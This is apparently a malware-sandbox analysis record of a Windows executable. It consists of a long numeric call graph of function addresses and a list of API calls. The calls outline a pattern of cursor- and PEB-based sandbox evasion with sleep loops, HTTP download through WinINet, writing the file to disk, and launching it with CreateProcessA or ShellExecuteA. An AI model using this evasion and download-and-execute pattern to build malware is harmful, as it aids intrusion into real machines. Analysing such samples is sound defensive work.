48831 4268a3 _Error_objects 48822->48831 48823->48817 48932 53f0da 46 API calls _Error_objects 48823->48932 48825 4267dc 48933 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48825->48933 48827 42694d 48826->48827 48937 4f57c0 46 API calls 48826->48937 48830 4269c5 lstrcatA 48827->48830 48835 426a08 Concurrency::wait 48830->48835 48831->48826 48935 53f0da 46 API calls _Error_objects 48831->48935 48833 4268c3 48936 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48833->48936 48836 41a1e0 std::ios_base::clear 46 API calls 48835->48836 48838 426a53 48836->48838 48837 426aa4 48840 426b35 48837->48840 48938 4ef210 46 API calls 48837->48938 48838->48837 48839 414e70 std::ios_base::clear 46 API calls 48838->48839 48839->48837 48842 417140 std::ios_base::clear 43 API calls 48840->48842 48844 426b40 GetModuleHandleA 48842->48844 48843 426aea 48939 4172e0 46 API calls _Yarn 48843->48939 48845 426b66 48844->48845 48849 426b9d 48844->48849 48846 53f1aa 3 API calls 48845->48846 48856 426c1a 48849->48856 48942 4f57c0 46 API calls 48849->48942 48850 426c3f 48851 426c2c 48856->48850 48856->48851 48904->48707 48905->48704 48906->48712 48907->48723 48908->48714 48909->48718 48910->48730 48911->48722 48912->48726 48913->48740 48914->48737 48915->48758 48916->48746 48917->48753 48918->48763 48919->48752 48920->48760 48921->48772 48922->48769 48923->48784 48924->48778 48925->48786 48926->48789 48927->48798 48928->48794 48929->48810 48930->48807 48931->48815 48932->48825 48933->48817 48934->48821 48935->48833 48936->48826 48937->48827 48938->48843 48939->48840 48942->48856 48954 433130 GetCursorPos 48960 433149 48954->48960 48955 433156 GetCursorPos 48956 43342f GetPEB 48955->48956 48955->48960 48956->48960 48957 43317e GetPEB 48957->48960 48958 4335d2 Sleep 48958->48960 48959 433306 Sleep GetCursorPos 48959->48956 48959->48960 48960->48955 48960->48956 48960->48957 48960->48958 48960->48959 48961 43333e __aulldiv __vswprintf_s_l 48960->48961 48962 437b10 48963 437b53 Concurrency::wait 48962->48963 48964 41a1e0 std::ios_base::clear 46 API calls 48963->48964 48965 437bb3 Concurrency::wait 48964->48965 48965->48965 48966 41a1e0 std::ios_base::clear 46 API calls 48965->48966 48967 437c24 Concurrency::wait 48966->48967 48968 43826a Concurrency::wait 48967->48968 48969 41a1e0 std::ios_base::clear 46 API calls 48967->48969 48968->48968 48970 41a1e0 std::ios_base::clear 46 API calls 48968->48970 48971 437cbb 48969->48971 48972 43850b 48970->48972 48973 53ee6e std::_Facet_Register 17 API calls 48971->48973 48974 53ee6e std::_Facet_Register 17 API calls 48972->48974 48975 437cc5 Concurrency::wait 48973->48975 48976 438515 Concurrency::wait 48974->48976 48977 4f5c80 46 API calls 48975->48977 48978 4f5c80 46 API calls 48976->48978 48979 437d8f Concurrency::wait 48977->48979 48980 4385df Concurrency::wait 48978->48980 48979->48979 48982 41a1e0 std::ios_base::clear 46 API calls 48979->48982 48980->48980 48981 41a1e0 std::ios_base::clear 46 API calls 48980->48981 48983 438659 48981->48983 48985 437e0f Concurrency::wait 48982->48985 48984 4187e0 46 API calls 48983->48984 48986 438724 48984->48986 48989 41a1e0 std::ios_base::clear 46 API calls 48985->48989 48987 509bd0 70 API calls 48986->48987 48988 438736 48987->48988 48990 4398be 48988->48990 49227 4f47f0 59 API calls 48988->49227 48992 437f5a 48989->48992 48991 417140 std::ios_base::clear 43 API calls 48990->48991 48998 4398c9 48991->48998 48994 509bd0 70 API calls 48992->48994 48995 437f69 48994->48995 48996 43825f 48995->48996 49222 4f47f0 59 API calls 48995->49222 48999 417140 std::ios_base::clear 43 API calls 48996->48999 48997 43989f 49247 4f1460 46 API calls 3 library calls 48997->49247 49001 439b07 48998->49001 49008 439b2e Concurrency::wait 48998->49008 48999->48968 49003 439b1b 49001->49003 49005 417140 std::ios_base::clear 43 API calls 49001->49005 49006 417140 std::ios_base::clear 43 API calls 49003->49006 49004 438781 49004->48997 49228 4f4600 46 API calls 2 library calls 49004->49228 49005->49003 49007 439b26 49006->49007 49008->49008 49011 41a1e0 std::ios_base::clear 46 API calls 49008->49011 49009 438240 49226 4f1460 46 API calls 3 library calls 49009->49226 49013 439ba6 49011->49013 49015 53ee6e std::_Facet_Register 17 API calls 49013->49015 49014 437fb4 49014->49009 49223 4f4600 46 API calls 2 library calls 49014->49223 49019 439bb0 Concurrency::wait 49015->49019 49016 4388ac 49016->48997 49229 4f4600 46 API calls 2 library calls 49016->49229 49021 4f5c80 46 API calls 49019->49021 49020 4380b6 49020->49009 49224 4f4600 46 API calls 2 library calls 49020->49224 49025 439c77 Concurrency::wait 49021->49025 49023 4389ae 49230 4f4600 46 API calls 2 library calls 49023->49230 49025->49025 49027 41a1e0 std::ios_base::clear 46 API calls 49025->49027 49026 43818f Concurrency::wait 49225 506eb0 46 API calls __Getctype 49026->49225 49034 439cf1 49027->49034 49028 438cfb 49234 4f4600 46 API calls 2 library calls 49028->49234 49029 438a82 49029->49028 49231 4f4600 46 API calls 2 library calls 49029->49231 49031 4381e1 49035 417140 std::ios_base::clear 43 API calls 49031->49035 49037 4381f4 std::ios_base::clear 49031->49037 49038 4187e0 46 API calls 49034->49038 49035->49037 49036 417140 std::ios_base::clear 43 API calls 49036->49009 49037->49036 49039 439dbc 49038->49039 49042 509bd0 70 API calls 49039->49042 49040 438dc7 49235 4f4600 46 API calls 2 library calls 49040->49235 49041 438b84 49232 4f4600 46 API calls 2 library calls 49041->49232 49043 439dce 49042->49043 49046 43a7f3 49043->49046 49248 4f47f0 59 API calls 49043->49248 49049 417140 std::ios_base::clear 43 API calls 49046->49049 49048 438e9b 49236 4f4600 46 API calls 2 library calls 49048->49236 49052 43a7fe 49049->49052 49051 438c58 Concurrency::wait 49233 506eb0 46 API calls __Getctype 49051->49233 49054 43aa63 49052->49054 49055 43aa3c 49052->49055 49053 43a7d4 49262 4f1460 46 API calls 3 library calls 49053->49262 49060 414fd0 std::ios_base::clear 46 API calls 49054->49060 49058 43aa50 49055->49058 49062 417140 std::ios_base::clear 43 API calls 49055->49062 49063 417140 std::ios_base::clear 43 API calls 49058->49063 49059 438caa 49065 417140 std::ios_base::clear 43 API calls 49059->49065 49067 438cb8 std::ios_base::clear 49059->49067 49064 43aa7a 49060->49064 49061 438f79 49061->48997 49237 4f4600 46 API calls 2 library calls 49061->49237 49062->49058 49063->49007 49066 53ee6e std::_Facet_Register 17 API calls 49064->49066 49065->49067 49072 43aa84 49066->49072 49068 417140 std::ios_base::clear 43 API calls 49067->49068 49068->49028 49070 439e19 49070->49053 49249 4f4600 46 API calls 2 library calls 49070->49249 49263 4eede0 46 API calls 49072->49263 49073 43907b 49238 4f4600 46 API calls 2 library calls 49073->49238 49076 43ab7d 49077 414fd0 std::ios_base::clear 46 API calls 49076->49077 49079 43ab8c 49077->49079 49078 439f3a 49078->49053 49250 4f4600 46 API calls 2 library calls 49078->49250 49081 414fd0 std::ios_base::clear 46 API calls 49079->49081 49080 43914f 49175 43982c 49080->49175 49239 4f4600 46 API calls 2 library calls 49080->49239 49083 43aba7 49081->49083 49084 509bd0 70 API calls 49083->49084 49086 43abb6 49084->49086 49085 439888 49085->48997 49090 417140 std::ios_base::clear 43 API calls 49085->49090 49089 43afc7 49086->49089 49264 4f47f0 59 API calls 49086->49264 49093 417140 std::ios_base::clear 43 API calls 49089->49093 49090->48997 49091 43a032 49251 4f4600 46 API calls 2 library calls 49091->49251 49098 43afd2 49093->49098 49094 439251 49240 4f4600 46 API calls 2 library calls 49094->49240 49097 43afa8 49273 4f1460 46 API calls 3 library calls 49097->49273 49099 414fd0 std::ios_base::clear 46 API calls 49098->49099 49105 43b212 49099->49105 49100 439325 49241 4f4600 46 API calls 2 library calls 49100->49241 49102 43abf6 49102->49097 49265 4f4600 46 API calls 2 library calls 49102->49265 49104 43a2fe 49256 4f4600 46 API calls 2 library calls 49104->49256 49110 414fd0 std::ios_base::clear 46 API calls 49105->49110 49106 43a106 49106->49104 49252 4f4600 46 API calls 2 library calls 49106->49252 49111 43b2d3 49110->49111 49112 433be0 92 API calls 49111->49112 49147 43b2df Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49112->49147 49113 43acf8 49113->49097 49266 4f4600 46 API calls 2 library calls 49113->49266 49114 43a1fe 49253 4f4600 46 API calls 2 library calls 49114->49253 49115 43a3c0 49257 4f4600 46 API calls 2 library calls 49115->49257 49119 439403 Concurrency::wait 49127 41a1e0 std::ios_base::clear 46 API calls 49119->49127 49119->49175 49120 43a2d2 49254 4f48c0 46 API calls 49120->49254 49121 43add1 49267 4f48c0 46 API calls 49121->49267 49124 43a2ea 49255 41b3b0 43 API calls std::ios_base::clear 49124->49255 49125 43ade9 49268 41b3b0 43 API calls std::ios_base::clear 49125->49268 49126 43b4b2 49131 43bfaa 49126->49131 49135 414fd0 std::ios_base::clear 46 API calls 49126->49135 49132 43956e 49127->49132 49130 43adf5 49134 417140 std::ios_base::clear 43 API calls 49130->49134 49136 417140 std::ios_base::clear 43 API calls 49131->49136 49242 506f90 46 API calls 49132->49242 49133 43a2f3 49138 417140 std::ios_base::clear 43 API calls 49133->49138 49139 43ae00 49134->49139 49140 43b4db 49135->49140 49142 43bfb5 49136->49142 49138->49104 49269 4f4600 46 API calls 2 library calls 49139->49269 49144 53ee6e std::_Facet_Register 17 API calls 49140->49144 49141 43a494 49141->49053 49258 4f4600 46 API calls 2 library calls 49141->49258 49145 417140 std::ios_base::clear 43 API calls 49142->49145 49143 4395a0 49243 4f4600 46 API calls 2 library calls 49143->49243 49182 43b4e5 __aulldiv __vswprintf_s_l 49144->49182 49151 43bfc0 49145->49151 49147->49126 49274 42bcc0 55 API calls 3 library calls 49147->49274 49153 43c215 49151->49153 49156 417140 std::ios_base::clear 43 API calls 49151->49156 49152 43b498 49275 41b3b0 43 API calls std::ios_base::clear 49152->49275 49157 417140 std::ios_base::clear 43 API calls 49153->49157 49155 43b4a7 49160 417140 std::ios_base::clear 43 API calls 49155->49160 49156->49153 49157->49007 49158 439673 49244 4f4600 46 API calls 2 library calls 49158->49244 49159 43aea3 49159->49097 49270 4f4600 46 API calls 2 library calls 49159->49270 49160->49126 49161 43a7bd 49161->49053 49166 417140 std::ios_base::clear 43 API calls 49161->49166 49162 43a58c 49169 414fd0 std::ios_base::clear 46 API calls 49162->49169 49181 43a761 49162->49181 49166->49053 49167 439747 49245 4f4600 46 API calls 2 library calls 49167->49245 49168 43af7c 49271 4f48c0 46 API calls 49168->49271 49171 43a688 49169->49171 49259 4f46f0 46 API calls 49171->49259 49173 43af94 49272 41b3b0 43 API calls std::ios_base::clear 49173->49272 49175->49085 49246 4f1460 46 API calls 3 library calls 49175->49246 49177 43af9d 49178 417140 std::ios_base::clear 43 API calls 49177->49178 49178->49097 49179 43a694 49260 4f4600 46 API calls 2 library calls 49179->49260 49181->49161 49261 4f1460 46 API calls 3 library calls 49181->49261 49276 4eede0 46 API calls 49182->49276 49184 43b860 49185 414fd0 std::ios_base::clear 46 API calls 49184->49185 49186 43b86f 49185->49186 49187 4187e0 46 API calls 49186->49187 49188 43b892 49187->49188 49189 509bd0 70 API calls 49188->49189 49190 43b8ae 49189->49190 49191 43bf9f 49190->49191 49277 4f47f0 59 API calls 49190->49277 49192 417140 std::ios_base::clear 43 API calls 49191->49192 49192->49131 49194 43bf80 49288 4f1460 46 API calls 3 library calls 49194->49288 49196 43b92c 49196->49194 49197 53f1aa 3 API calls 49196->49197 49198 43b9d9 49196->49198 49200 43b9ac _Error_objects 49197->49200 49202 43ba5f 49198->49202 49280 4f57c0 46 API calls 49198->49280 49200->49198 49278 53f0da 46 API calls _Error_objects 49200->49278 49281 4f4600 46 API calls 2 library calls 49202->49281 49203 43b9cc 49279 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49203->49279 49206 43bb39 49206->49194 49282 4f4600 46 API calls 2 library calls 49206->49282 49208 43bc3d 49283 4fb6e0 46 API calls 49208->49283 49210 43bc52 49284 4f4600 46 API calls 2 library calls 49210->49284 49212 43bf69 49212->49194 49215 417140 std::ios_base::clear 43 API calls 49212->49215 49214 43bd20 49216 414fd0 std::ios_base::clear 46 API calls 49214->49216 49221 43bf0d 49214->49221 49215->49194 49217 43be28 49216->49217 49285 4f46f0 46 API calls 49217->49285 49219 43be34 49286 4f4600 46 API calls 2 library calls 49219->49286 49221->49212 49287 4f1460 46 API calls 3 library calls 49221->49287 49222->49014 49223->49020 49224->49026 49225->49031 49226->48996 49227->49004 49228->49016 49229->49023 49230->49029 49231->49041 49232->49051 49233->49059 49234->49040 49235->49048 49236->49061 49237->49073 49238->49080 49239->49094 49240->49100 49241->49119 49242->49143 49243->49158 49244->49167 49245->49175 49246->49085 49247->48990 49248->49070 49249->49078 49250->49091 49251->49106 49252->49114 49253->49120 49254->49124 49255->49133 49256->49115 49257->49141 49258->49162 49259->49179 49260->49181 49261->49161 49262->49046 49263->49076 49264->49102 49265->49113 49266->49121 49267->49125 49268->49130 49269->49159 49270->49168 49271->49173 49272->49177 49273->49089 49274->49152 49275->49155 49276->49184 49277->49196 49278->49203 49279->49198 49280->49202 49281->49206 49282->49208 49283->49210 49284->49214 49285->49219 49286->49221 49287->49212 49288->49191 49289 4cef10 49290 4cef2f 49289->49290 49291 53f1aa 3 API calls 49290->49291 49292 4cf04f 49290->49292 49294 4cf022 _Error_objects 49291->49294 49298 4cf0cf __aulldiv __vswprintf_s_l 49292->49298 49745 4f57c0 46 API calls 49292->49745 49294->49292 49743 53f0da 46 API calls _Error_objects 49294->49743 49296 4cf042 49744 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49296->49744 49559 50cec0 49298->49559 49300 4d0290 Concurrency::wait 49300->49300 49302 41a1e0 std::ios_base::clear 46 API calls 49300->49302 49301 4cf170 __aulldiv Concurrency::wait __vswprintf_s_l 49301->49300 49301->49301 49303 41a1e0 std::ios_base::clear 46 API calls 49301->49303 49307 4d1720 49302->49307 49304 4cf35a 49303->49304 49566 432880 49304->49566 49308 4d1771 49307->49308 49311 414e70 std::ios_base::clear 46 API calls 49307->49311 49314 4d1811 49308->49314 49790 4ef210 46 API calls 49308->49790 49309 4cf378 49313 414fd0 std::ios_base::clear 46 API calls 49309->49313 49310 4d16a3 49789 4ceef0 48 API calls std::ios_base::clear 49310->49789 49311->49308 49319 4cf388 49313->49319 49315 417140 std::ios_base::clear 43 API calls 49314->49315 49317 4d181c 49315->49317 49318 4d17b7 49791 4172e0 46 API calls _Yarn 49318->49791 49320 4cf3d9 49319->49320 49322 414e70 std::ios_base::clear 46 API calls 49319->49322 49323 4cf479 49320->49323 49746 4ef210 46 API calls 49320->49746 49322->49320 49324 417140 std::ios_base::clear 43 API calls 49323->49324 49328 4cf484 Concurrency::wait 49324->49328 49326 4cf41f 49747 4172e0 46 API calls _Yarn 49326->49747 49328->49328 49329 41a1e0 std::ios_base::clear 46 API calls 49328->49329 49330 4cf511 49329->49330 49588 430740 49330->49588 49332 4cf516 Concurrency::wait 49332->49332 49333 41a1e0 std::ios_base::clear 46 API calls 49332->49333 49334 4cf5a6 49333->49334 49656 4317e0 49334->49656 49337 53f1aa 3 API calls 49342 4cf5ce _Error_objects 49337->49342 49338 4cf5fb 49340 4cf67b 49338->49340 49750 4f57c0 46 API calls 49338->49750 49341 53f1aa 3 API calls 49340->49341 49344 4cf6d5 49340->49344 49348 4cf6a8 _Error_objects 49341->49348 49342->49338 49748 53f0da 46 API calls _Error_objects 49342->49748 49350 4cf755 Concurrency::wait 49344->49350 49753 4f57c0 46 API calls 49344->49753 49345 4cf5ee 49749 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49345->49749 49348->49344 49751 53f0da 46 API calls _Error_objects 49348->49751 49353 41a1e0 std::ios_base::clear 46 API calls 49350->49353 49351 4cf6c8 49752 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49351->49752 49354 4cf7e4 49353->49354 49724 432b60 49354->49724 49792 50cce0 49559->49792 49561 50cef9 49561->49301 49564 50ceed __aulldiv __vswprintf_s_l 49564->49561 49812 50ca00 49564->49812 49567 4328d4 __aulldiv Concurrency::wait __vswprintf_s_l 49566->49567 49567->49567 49568 41a1e0 std::ios_base::clear 46 API calls 49567->49568 49570 4329b2 49568->49570 49569 4329f4 49572 432a70 49569->49572 49937 4ef210 46 API calls 49569->49937 49570->49569 49571 414e70 std::ios_base::clear 46 API calls 49570->49571 49571->49569 49574 417140 std::ios_base::clear 43 API calls 49572->49574 49577 432a7b Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49574->49577 49575 432a31 49938 4172e0 46 API calls _Yarn 49575->49938 49578 54f78c 46 API calls 49577->49578 49579 432b06 49578->49579 49580 432b3a 49579->49580 49581 54fc1b 74 API calls 49579->49581 49582 417140 std::ios_base::clear 43 API calls 49580->49582 49583 432b1f 49581->49583 49584 432b4b 49582->49584 49585 54f66e 46 API calls 49583->49585 49584->49309 49584->49310 49586 432b2b 49585->49586 49587 54f8c8 77 API calls 49586->49587 49587->49580 49589 430760 Concurrency::wait 49588->49589 49590 41a1e0 std::ios_base::clear 46 API calls 49589->49590 49591 43079c __aulldiv __vswprintf_s_l 49590->49591 49592 414fd0 std::ios_base::clear 46 API calls 49591->49592 49593 4308c0 49592->49593 49594 430902 49593->49594 49595 414e70 std::ios_base::clear 46 API calls 49593->49595 49596 43098a 49594->49596 49939 4ef210 46 API calls 49594->49939 49595->49594 49598 417140 std::ios_base::clear 43 API calls 49596->49598 49600 430995 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49598->49600 49599 43093f 49940 4172e0 46 API calls _Yarn 49599->49940 49602 54f78c 46 API calls 49600->49602 49603 430a3e 49602->49603 49604 43120c 49603->49604 49609 430a4e __aulldiv __vswprintf_s_l 49603->49609 49605 417140 std::ios_base::clear 43 API calls 49604->49605 49606 431218 49605->49606 49607 417140 std::ios_base::clear 43 API calls 49606->49607 49608 430d27 49607->49608 49608->49332 49610 55012d __fread_nolock 55 API calls 49609->49610 49611 430c44 __aulldiv __vswprintf_s_l 49610->49611 49612 430d07 49611->49612 49618 430d2f __aulldiv __vswprintf_s_l 49611->49618 49613 54f8c8 77 API calls 49612->49613 49614 430d10 49613->49614 49615 417140 std::ios_base::clear 43 API calls 49614->49615 49616 430d1f 49615->49616 49617 417140 std::ios_base::clear 43 API calls 49616->49617 49617->49608 49619 54fc1b 74 API calls 49618->49619 49620 430e1b 49619->49620 49621 54f66e 46 API calls 49620->49621 49622 430e27 __aulldiv __vswprintf_s_l 49621->49622 49623 54fc1b 74 API calls 49622->49623 49624 430fbc 49623->49624 49625 41bba0 46 API calls 49624->49625 49626 430fcd __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 49624->49626 49625->49626 49627 55012d __fread_nolock 55 API calls 49626->49627 49628 431136 49627->49628 49629 53f1aa 3 API calls 49628->49629 49630 431187 49628->49630 49633 43115a _Error_objects 49629->49633 49634 4311f2 49630->49634 49943 4f57c0 46 API calls 49630->49943 49632 54f8c8 77 API calls 49646 431207 __aulldiv __vswprintf_s_l 49632->49646 49633->49630 49941 53f0da 46 API calls _Error_objects 49633->49941 49634->49632 49636 43117a 49942 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49636->49942 49638 43168a Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49639 4316a1 CreateFileA 49638->49639 49640 4316b1 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49639->49640 49641 4316e5 49639->49641 49643 4316d0 WriteFile CloseHandle 49640->49643 49642 431732 49641->49642 49644 53f1aa 3 API calls 49641->49644 49647 4317b3 49642->49647 49946 4f57c0 46 API calls 49642->49946 49643->49641 49650 431705 _Error_objects 49644->49650 49646->49638 49648 417140 std::ios_base::clear 43 API calls 49647->49648 49649 4317cb 49648->49649 49651 417140 std::ios_base::clear 43 API calls 49649->49651 49650->49642 49944 53f0da 46 API calls _Error_objects 49650->49944 49654 4317d3 49651->49654 49653 431725 49945 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 49653->49945 49654->49608 49657 431800 Concurrency::wait 49656->49657 49658 41a1e0 std::ios_base::clear 46 API calls 49657->49658 49659 43183c __aulldiv __vswprintf_s_l 49658->49659 49660 414fd0 std::ios_base::clear 46 API calls 49659->49660 49661 431960 49660->49661 49662 4319a2 49661->49662 49663 414e70 std::ios_base::clear 46 API calls 49661->49663 49664 431a2a 49662->49664 49947 4ef210 46 API calls 49662->49947 49663->49662 49665 417140 std::ios_base::clear 43 API calls 49664->49665 49668 431a35 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49665->49668 49667 4319df 49948 4172e0 46 API calls _Yarn 49667->49948 49670 54f78c 46 API calls 49668->49670 49671 431ade 49670->49671 49672 4322ac 49671->49672 49677 431aee __aulldiv __vswprintf_s_l 49671->49677 49673 417140 std::ios_base::clear 43 API calls 49672->49673 49674 4322b8 49673->49674 49675 417140 std::ios_base::clear 43 API calls 49674->49675 49676 431dc7 49675->49676 49676->49337 49676->49338 49678 55012d __fread_nolock 55 API calls 49677->49678 49679 431ce4 __aulldiv __vswprintf_s_l 49678->49679 49680 431da7 49679->49680 49686 431dcf __aulldiv __vswprintf_s_l 49679->49686 49681 54f8c8 77 API calls 49680->49681 49682 431db0 49681->49682 49683 417140 std::ios_base::clear 43 API calls 49682->49683 49684 431dbf 49683->49684 49685 417140 std::ios_base::clear 43 API calls 49684->49685 49685->49676 49687 54fc1b 74 API calls 49686->49687 49688 431ebb 49687->49688 49689 54f66e 46 API calls 49688->49689 49690 431ec7 __aulldiv __vswprintf_s_l 49689->49690 49691 54fc1b 74 API calls 49690->49691 49692 43205c 49691->49692 49693 41bba0 46 API calls 49692->49693 49694 43206d __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 49692->49694 49693->49694 49695 55012d __fread_nolock 55 API calls 49694->49695 49696 4321d6 49695->49696 49697 53f1aa 3 API calls 49696->49697 49698 432227 49696->49698 49701 4321fa _Error_objects 49697->49701 49702 432292 49698->49702 49951 4f57c0 46 API calls 49698->49951 49699 54f8c8 77 API calls 49701->49698 49949 53f0da 46 API calls _Error_objects 49701->49949 49702->49699 49725 4150c0 std::bad_exception::bad_exception 46 API calls 49724->49725 49726 432b77 49725->49726 49727 432880 82 API calls 49726->49727 49729 432b7c Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49727->49729 49743->49296 49744->49292 49745->49298 49746->49326 49747->49323 49748->49345 49749->49338 49750->49340 49751->49351 49752->49344 49753->49350 49789->49300 49790->49318 49791->49314 49833 50c690 49792->49833 49796 50cd28 49796->49564 49797 50cd1c Concurrency::wait 49797->49796 49798 41a1e0 std::ios_base::clear 46 API calls 49797->49798 49799 50cd85 49798->49799 49800 50cdbe 49799->49800 49801 414e70 std::ios_base::clear 46 API calls 49799->49801 49802 50ce2e 49800->49802 49842 4ef210 46 API calls 49800->49842 49801->49800 49804 417140 std::ios_base::clear 43 API calls 49802->49804 49806 50ce36 49804->49806 49805 50cdf2 49843 4172e0 46 API calls _Yarn 49805->49843 49807 50ce3c lstrlenA 49806->49807 49808 50ce4e 49806->49808 49810 50ce5a GetProcessHeap HeapAlloc lstrcpynA 49807->49810 49808->49810 49810->49796 49813 50ca52 _Error_objects 49812->49813 49844 50c6e0 InternetOpenA 49813->49844 49816 50cab0 49818 41e940 43 API calls 49816->49818 49817 50cac7 49819 50cb2b InternetReadFile 49817->49819 49820 50cb6a 49817->49820 49831 50cb1f 49817->49831 49853 4f5680 49817->49853 49825 50cabf 49818->49825 49819->49817 49819->49820 49824 54f78c 46 API calls 49820->49824 49821 50ccaa 49863 41e940 49821->49863 49822 50cc9a InternetCloseHandle 49822->49821 49826 50cc46 49824->49826 49832 50cea0 GetProcessHeap HeapFree 49825->49832 49826->49831 49857 54ff1a 49826->49857 49830 54f8c8 77 API calls 49830->49831 49831->49821 49831->49822 49832->49561 49834 50c650 CharNextA 49833->49834 49835 50c6a6 49834->49835 49836 50c650 CharNextA 49835->49836 49837 50c6ce 49836->49837 49838 50c650 49837->49838 49839 50c669 49838->49839 49840 50c681 49839->49840 49841 50c65c CharNextA 49839->49841 49840->49797 49841->49839 49842->49805 49843->49802 49845 50c740 49844->49845 49846 50c74a InternetConnectA 49844->49846 49845->49816 49845->49817 49849 50c794 HttpOpenRequestA HttpSendRequestA 49846->49849 49850 50c87e GetLastError 49849->49850 49851 50c8a9 __aulldiv __vswprintf_s_l 49849->49851 49850->49851 49851->49845 49852 50c9af InternetCloseHandle 49851->49852 49852->49845 49854 4f56e6 49853->49854 49855 4f56a5 49853->49855 49867 4fc700 49854->49867 49855->49817 49858 54ff2d __vswprintf_s_l 49857->49858 49884 54fcfc 49858->49884 49860 54ff42 49861 54bc9c __vswprintf_s_l 43 API calls 49860->49861 49862 50cc85 49861->49862 49862->49830 49864 41e975 49863->49864 49865 41e9ac std::ios_base::_Ios_base_dtor 49863->49865 49864->49865 49936 40dc20 43 API calls std::ios_base::clear 49864->49936 49865->49825 49868 4fc76e 49867->49868 49869 4fc797 49868->49869 49882 41db00 45 API calls std::ios_base::clear 49868->49882 49871 4fc7d3 49869->49871 49872 4fc7c2 49869->49872 49874 53ee6e std::_Facet_Register 17 API calls 49871->49874 49875 4fc7cb 49871->49875 49873 41d950 std::ios_base::clear 46 API calls 49872->49873 49873->49875 49874->49875 49878 501430 49875->49878 49877 4fc8ef 49877->49855 49879 501465 49878->49879 49881 50149c std::ios_base::_Ios_base_dtor 49878->49881 49879->49881 49883 40dc20 43 API calls std::ios_base::clear 49879->49883 49881->49877 49882->49869 49883->49881 49885 54fd0a 49884->49885 49890 54fd32 49884->49890 49886 54fd17 49885->49886 49887 54fd39 49885->49887 49885->49890 49900 553e0f 29 API calls 2 library calls 49886->49900 49892 54fc55 49887->49892 49890->49860 49893 54fc61 ___unDNameEx 49892->49893 49901 550723 EnterCriticalSection 49893->49901 49895 54fc6f 49902 54fcb0 49895->49902 49899 54fc8d 49899->49860 49900->49890 49901->49895 49910 55cff0 49902->49910 49908 54fc7c 49909 54fca4 LeaveCriticalSection __fread_nolock 49908->49909 49909->49899 49927 55cfb2 49910->49927 49912 55d001 49913 54fcc8 49912->49913 49934 55b45b 15 API calls 2 library calls 49912->49934 49917 54fd73 49913->49917 49915 55d05a 49916 55b421 __aligned_free 14 API calls 49915->49916 49916->49913 49919 54fd85 49917->49919 49921 54fce6 49917->49921 49918 54fd93 49935 553e0f 29 API calls 2 library calls 49918->49935 49919->49918 49919->49921 49924 54fdc9 _Yarn 49919->49924 49926 55d09b 72 API calls 49921->49926 49922 5539e8 72 API calls 49922->49924 49923 55cf76 __fread_nolock 43 API calls 49923->49924 49924->49921 49924->49922 49924->49923 49925 55923a 72 API calls 49924->49925 49925->49924 49926->49908 49928 55cfbe 49927->49928 49929 55cfe8 49928->49929 49930 55cf76 __fread_nolock 43 API calls 49928->49930 49929->49912 49931 55cfd9 49930->49931 49932 562150 __fread_nolock 43 API calls 49931->49932 49933 55cfdf 49932->49933 49933->49912 49934->49915 49935->49921 49936->49865 49937->49575 49938->49572 49939->49599 49940->49596 49941->49636 49942->49630 49943->49634 49944->49653 49945->49642 49946->49647 49947->49667 49948->49664 49951->49702
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004CF133
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004CF26D
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000000C8,?,?,?), ref: 004CFB61
                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 004CFB8A
                                                                                                                                                                                                                                          • GetBinaryTypeA.KERNEL32(00000000,FFFFFFFF), ref: 004CFBB4
                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0070
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D0081
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D008E
                                                                                                                                                                                                                                          • GetBinaryTypeA.KERNEL32(?,FFFFFFFF,?), ref: 004D02B0
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000000C8), ref: 004D04AD
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 004D04D6
                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0999
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004D09AA
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004D09B7
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004D1307
                                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,?), ref: 004D14AC
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
